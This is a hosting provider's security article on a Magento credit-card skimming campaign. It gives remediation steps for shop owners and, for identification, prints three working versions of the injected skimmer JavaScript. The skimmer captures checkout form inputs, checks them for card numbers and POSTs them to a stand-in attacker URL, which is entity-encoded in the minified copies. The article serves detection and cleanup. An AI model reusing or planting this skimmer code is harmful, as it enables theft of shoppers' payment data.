How to fix malicious JavaScript Credit card Hijack?

in Security Tags: MagentoMagereportSecurity

The hack Credit card Hijack is malicious code in Magento that allows hackers to intercept financial data, such as credit card credentials. This article further explains what this security breach means, what the consequences are and how you can fix it.

After analyzing the hack we discovered no Hypernodes were compromised. Although none of our customers’ shops suffers the Credit card Hijack, we do recommend your to check your site with magereport.com for other vulnerabilities.

What is Credit card Hijack?

Credit card Hijack is malicious code injected in Magento that allows hackers to intercept financial data, such as credit card credentials. With this new attack, credit cards are captured unencrypted and continuously. With this new way of hacking, malware is added in the browser of your websites’ visitors. This malware intercepts the credit card credentials the moment your customer types them in their browser. At this point the credentials aren’t encrypted yet.

Once the leak was discovered we analyzed the malware. We found out that at this moment a staggering amount of 3500 Magento shops are part of a zombie network that interfere credit card credentials, and send this data to so called command&control servers. (Command&control servers are a network of servers where hackers collect this sort of data). This is the first time we encountered an automated credit card fraud on this scale. It’s obvious hackers have massively improved in becoming more professional in automating large-scale credit card fraud.

Read more about Credit card Hijack

We suspect this leak has been made possible due to unpatched Magento shops. So if you haven’t completely patched your Magento shop yet, make sure you do. Use Magereport.com to check if there are any patches not yet installed.

What are the consequences?

Credit card Hijack allows hackers to intercept your customers financial data. With this information they can commit global credit card fraud, causing a lot of financial damage.

The fraud can be traced back to May 12th, which implies the malpractice went unnoticed for months and is still active.

How do I fix it?

Fixing this breach is not an easy task. If you don’t have a lot of knowledge of Magento’s security, we recommend you hire an Magento developer or specialist experienced in Magento security.

Apply all available Magento patches

Scan your shop with Magereport.com to find out what patches have been and have not been installed yet. When a patch isn’t installed, install it with the instructions given or use the article How to apply Magento Patches.

Review and remove

Review all admin users in your system via Magento’s backend (navigate to system>Permissions>Roles). Remove any accounts which you are not actively using and set strong passwords for all admin users you do use.

Remove unknown scripts (PHP & Javascript)

Search your shop for scripts similar to the ones below and remove them. Searching and removing can be done via Magento’s backend. Once logged in to your backend (screenshots below):

  1. Navigate to ‘System’ -> Configuration
  2. Go to ‘Design’ under ‘General’
  3. Scroll down and open HTML Head to check ‘Miscellaneous Scripts’
  4. Scroll down and open Footer to check Miscellaneous HTML

1. Navigate to ‘System’ -> Configuration

1. System -> Configuration

 

 

 

 

2. Go to ‘Design’ under ‘General’

2. Go to Design (under General)

 

 

 

 

 

 

3. Scroll down and open HTML Head to check ‘Miscellaneous Scripts’

3. Scroll down to Miscellaneous scripts

 

 

 

 

 

 

4. Scroll down and open Footer to check Miscellaneous HTML

4. Scroll down and open Footer

 

 

 

 

 

 

If Miscellaneous scripts and Miscellaneous HTML are empty, you’re most likely safe. If not, check if they contain the scripts below:

The script below is an example of a minified version of the scraper Javascript.

<script>function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")||(document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"),u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+jj("SESSIID")),console.clear()}}})});</script>

The script below is an example of Credit card Hijack’s malicious code. It installs the functions ‘send’ and ‘clk’, which allows hackers to collect the names and content of every common form input element, when your customer clicks a button or submits a form.

<script>
var snd =null;
window.onload = function () {
 if((new RegExp('onepage')).test(window.location)) {
 send();
 
 }
};
 
function clk() {
 var inp=document.querySelectorAll("input, select, textarea, checkbox");
 for (var i=0;i<inp.length;i++){
 if(inp[i].value.length>0) {
 var nme=inp[i].name;
 if(nme=='') { nme=i; }
 snd+=inp[i].name+'='+inp[i].value+'&';
 }
 }
 
}
 
function send() {
var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
 for (var i=0;i<btn.length;i++){
 var b=btn[i];
 if(b.type!='text' && b.type!='select' && b.type!='checkbox' && b.type!='password' && b.type!='radio') {
 if(b.addEventListener) {
 b.addEventListener("click", clk, false);
 }else {
 b.attachEvent('onclick', clk);
 }
 }
 }
 
 var frm=document.querySelectorAll("form");
 for (var i=0;i<frm.length;i++){
 if(frm[i].addEventListener) {
 frm[i].addEventListener("submit", clk, false);
 }else {
 frm[i].attachEvent('onsubmit', clk);
 }
 }
 
 if(snd!=null) {
 console.clear();
 var cc = new RegExp("[0-9]{13,16}");
 var asd="0";
 if(cc.test(snd)){
 asd="1" ;
 }
var http = new XMLHttpRequest();
http.open("POST","https://bad.guy/jquery.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("data="+snd+"&asd="+asd+"&id_id=ano.nym");
console.clear();
 }
 snd=null;
 setTimeout('send()', 150);
}
 
</script>

The script below was found during the research done by Byte. It covers the same functionality as the script above, but is harder to spot because it’s included in a minimized form. In this script Jquery is used to add unnamed click event-handler to every button on the page. If someone clicks the button, the function is triggered and allowed to collect al input data. It checks for credit card numbers and this information is sent off to their data collection server.

<script>
 function jj(e) {
 var t = "; " + document.cookie
 , o = t.split("; " + e + "=");
 return 2 == o.length ? o.pop().split(";").shift() : void 0
 }
 jj("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime())
 , jQuery(function (e) {
 e("button").on("click", function () {
 var t = ""
 , o = "post"
 , n = window.location;
 if (new RegExp("onepage|checkout").test(n)) {
 for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++)
 if (c[i].value.length > 0) {
 var a = c[i].name;
 "" == a && (a = i)
 , t += a + "=" + c[i].value + "&"
 }
 if (t) {
 var l = new RegExp("[0-9]{13,16}")
 , u = new XMLHttpRequest;
 u.open(o, e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(), !0)
 , u.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
 , u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + jj("SESSIID"))
 , console.clear()
 }
 }
 })
 });
</script>

Recover your shop

Since Credit card Hijack is an ongoing credit card fraud dating from may this year, it’s difficult to pinpoint how exactly the hackers got in. We assume it’s due to a combination of various know Magento leaks (these past months several Magento patches came out, and with it a high media coverage). It’s likely hackers used these security vulnerablities to set up this credit card fraud.

We recommend you ‘clean’ your shop following the steps written in the article Recover a hacked Magento Shop after installing all Magento patches, deleting inactive Magento admins and removing malicious code.

Need help?

Magento is no easy open source CMS. Although we’re very skilled in hosting Magento shops, making them fast and keeping conversion high, we’re no Magento developers. Luckily, we know a lot of agencies that do know a lot about how Magento works. If you need help, don’t hesitate to contact one of these agencies.

6